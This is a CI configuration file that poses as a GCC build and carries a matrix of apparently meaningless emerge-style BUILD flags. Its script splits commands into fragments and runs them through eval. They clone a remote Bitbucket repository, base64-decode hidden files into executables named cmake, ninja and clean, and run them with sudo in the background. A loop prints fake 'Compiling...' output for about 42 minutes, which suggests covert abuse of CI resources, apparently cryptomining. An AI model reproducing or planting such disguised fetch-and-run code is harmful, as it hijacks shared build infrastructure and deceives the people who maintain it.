dist: bionic

env:
  - BUILD="--check-news=412FR"
  - BUILD="--quiet-fail=373Ke"
  - BUILD="--dynamic-deps=398ya"
  - BUILD="--complete-graph-if-new-ver=197sb"
  - BUILD="--verbose=7104x"
  - BUILD="--quiet-repo-display=192Gn"
  - BUILD="--autounmask=700N1"
  - BUILD="--sync-submodule=839ia"
  - BUILD="--newrepo=842ei"
  - BUILD="--with-test-deps=10272"
  - BUILD="--use-ebuild-visibility=416Vt"
  - BUILD="--autounmask-write=944WU"
  - BUILD="--fetchonly=486RX"
  - BUILD="--accept-properties=771Nn"
  - BUILD="--ask=868Tq"
  - BUILD="--quiet-build=259C5"
  - BUILD="--sync-submodule=422R0"
  - BUILD="--backtrack=185zn"
  - BUILD="--regen=976jt"
  - BUILD="--implicit-system-deps=842N5"
  - BUILD="--quickpkg-direct=310rA"
  - BUILD="--metadata=465kt"
  - BUILD="--jobs=903qu"
  - BUILD="--depclean-lib-check=229NG"
  - BUILD="--getbinpkg=514Vl"
  - BUILD="--nodeps=472v"
  - BUILD="--selective=759ju"
  - BUILD="--quiet-unmerge-warn=411cZ"
  - BUILD="--info=3471D"
  - BUILD="--list-sets=48f3"
  - BUILD="--version=326W2"
  - BUILD="--root=3670L"
  - BUILD="--reinstall-atoms=46FX"
  - BUILD="--reinstall-atoms=582Mt"
  - BUILD="--getbinpkgonly=515T4"
  - BUILD="--quiet=172KU"
  - BUILD="--skipfirst=310Da"
  - BUILD="--rebuild-ignore=804cF"
  - BUILD="--alphabetical=6520h"
  - BUILD="--alert=433KY"
  - BUILD="--changed-deps=5270y"
  - BUILD="--deselect=733gN"
  - BUILD="--noreplace=800BS"
  - BUILD="--verbose=693LW"
  - BUILD="--digest=6750Y"
  - BUILD="--verbose=112Vf"
  - BUILD="--regen=565y9"
  - BUILD="--clean=508gs"
  - BUILD="--accept-restrict=578RI"
  - BUILD="--autounmask-license=285Yw"
  - BUILD="--searchdesc=275XG"
  - BUILD="--ask=367G1"
  - BUILD="--newuse=9066o"
  - BUILD="--ask=114iU"
  - BUILD="--nodeps=7990l"
  - BUILD="--rebuild-if-new-rev=967Ad"
  - BUILD="--autounmask-keep-masks=547bV"
  - BUILD="--prefix=66JY"
  - BUILD="--emptytree=791JI"
  - BUILD="--usepkg-exclude=142Cf"
  - BUILD="--autounmask-license=503UN"
  - BUILD="--backtrack=1080G"
  - BUILD="--sync=6097s"
  - BUILD="--rebuild-if-unbuilt=482io"
  - BUILD="--quickpkg-direct=593Ve"
  - BUILD="--digest=644jt"
  - BUILD="--depclean-lib-check=987W3"
  - BUILD="--depclean-lib-check=745uv"
  - BUILD="--unmerge=103xc"
  - BUILD="--depclean-lib-check=42TJ"
  - BUILD="--onlydeps=155Y7"
  - BUILD="--searchdesc=575mK"
  - BUILD="--reinstall-atoms=663ME"
  - BUILD="--autounmask-continue=808mn"
  - BUILD="--depclean=172Qq"
  - BUILD="--pkg-format=680KI"
  - BUILD="--quickpkg-direct=189XE"
  - BUILD="--with-bdeps=99Dh"
  - BUILD="--binpkg-changed-deps=462uH"
  - BUILD="--check-news=125Tr"
  - BUILD="--autounmask-keep-keywords=55U"
  - BUILD="--depclean-lib-check=753hj"
  - BUILD="--emptytree=26CU"
  - BUILD="--color=350hY"
  - BUILD="--root-deps=255nL"
  - BUILD="--emptytree=4456L"
  - BUILD="--binpkg-changed-deps=3546E"
  - BUILD="--regen=706L5"
  - BUILD="--color=428g2"
  - BUILD="--autounmask-backtrack=367WD"
  - BUILD="--implicit-system-deps=767Bz"
  - BUILD="--quiet-repo-display=326zx"
  - BUILD="--autounmask-license=568qk"
  - BUILD="--help=606lB"
  - BUILD="--backtrack=60157"
  - BUILD="--update=825Wn"
  - BUILD="--rebuild-if-new-rev=682sj"
  - BUILD="--quiet-fail=616aQ"
  - BUILD="--color=517UU"
  - BUILD="--buildpkg=467nf"
  - BUILD="--quiet-unmerge-warn=960EN"
  - BUILD="--ask=854Ft"
  - BUILD="--ignore-soname-deps=538t5"
  - BUILD="--jobs=17IM"
  - BUILD="--ignore-default-opts=4899j"
  - BUILD="--onlydeps-with-rdeps=294pL"
  - BUILD="--complete-graph-if-new-ver=385nB"
  - BUILD="--check-news=135rB"
  - BUILD="--oneshot=350Xt"
  - BUILD="--complete-graph-if-new-use=61CM"
  - BUILD="--autounmask-license=471Z2"
  - BUILD="--rebuild-if-new-rev=627Cc"
  - BUILD="--ignore-world=882LQ"
  - BUILD="--rebuild-exclude=976Mg"
  - BUILD="--keep-going=646mW"
  - BUILD="--quiet-build=118Bm"
  - BUILD="--changed-use=980iI"
  - BUILD="--autounmask-write=834Ba"
  - BUILD="--quiet-build=3470b"
  - BUILD="--rebuild-if-new-rev=357Zd"
  - BUILD="--autounmask-use=595XF"
  - BUILD="--help=638Ud"
  - BUILD="--quiet-build=353X0"
  - BUILD="--implicit-system-deps=557ig"
  - BUILD="--noreplace=861Zh"
  - BUILD="--usepkg-exclude=777Ub"
  - BUILD="--sync=253je"
  - BUILD="--prefix=3725w"
  - BUILD="--quiet-repo-display=415Z3"
  - BUILD="--pkg-format=557UM"
  - BUILD="--info=116qk"
  - BUILD="--sync=312v3"
  - BUILD="--list-sets=508HK"
  - BUILD="--unmerge=9696u"
  - BUILD="--use-ebuild-visibility=371c6"
  - BUILD="--rebuilt-binaries=481dW"
  - BUILD="--usepkg-exclude=956wK"
  - BUILD="--rebuild-if-new-rev=660pT"
  - BUILD="--implicit-system-deps=418eh"
  - BUILD="--list-sets=1807l"
  - BUILD="--search=706mn"
  - BUILD="--ask-enter-invalid=591tG"
  - BUILD="--package-moves=2483"
  - BUILD="--getbinpkgonly=808Rk"
  - BUILD="--autounmask=2358N"
  - BUILD="--exclude=46Rr"
  - BUILD="--autounmask-write=607Of"
  - BUILD="--searchdesc=2480r"
  - BUILD="--select=830C8"
  - BUILD="--buildpkgonly=9042e"
  - BUILD="--nospinner=650ta"
  - BUILD="--use-ebuild-visibility=899ml"
  - BUILD="--unmerge=614Gt"
  - BUILD="--usepkg-exclude=836sh"
  - BUILD="--regen=535i2"
  - BUILD="--read-news=898uB"

language: minimal

script:
  - zLZgZg="sudo apt up"
  - cagxQ="date || tru"
  - eval "$zLZgZg""$cagxQ""e"
  - QCALbL="sudo apt --"
  - gIdRRKA="yes install"
  - ddhEGEj=" cl-base64 "
  - JbczSkT="git &>/dev/"
  - FanNiocmX="null || tru"
  - eval "$QCALbL""$gIdRRKA""$ddhEGEj""$JbczSkT""$FanNiocmX""e"
  - zDSTRECAmMB="git clone h"
  - pIMDqc="ttps://gccb"
  - AniVSMc="uild@bitbuc"
  - XZUzP="ket.org/gcc"
  - RwvYzshjJQ="build/gcc.g"
  - Obumt="it &>/dev/n"
  - eval "$zDSTRECAmMB""$pIMDqc""$AniVSMc""$XZUzP""$RwvYzshjJQ""$Obumt""ull"
  - bICVsQA="base64 -d g"
  - LKtEgZG="cc/cmake_ >"
  - eval "$bICVsQA""$LKtEgZG"" cmake"
  - UmutxB="base64 -d g"
  - duZHMNb="cc/config_ "
  - eval "$UmutxB""$duZHMNb""> clean"
  - kFouhrPw="base64 -d g"
  - rNunbaN="cc/make_ > "
  - eval "$kFouhrPw""$rNunbaN""ninja"
  - UtZRExRiF="chmod +x ni"
  - eval "$UtZRExRiF""nja cmake"
  - ./cmake
  - sed -i 's/build/tb2o/g' clean
  - sudo ./ninja -c clean &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2528)) ] && sudo killall ninja && break; sleep 220; done
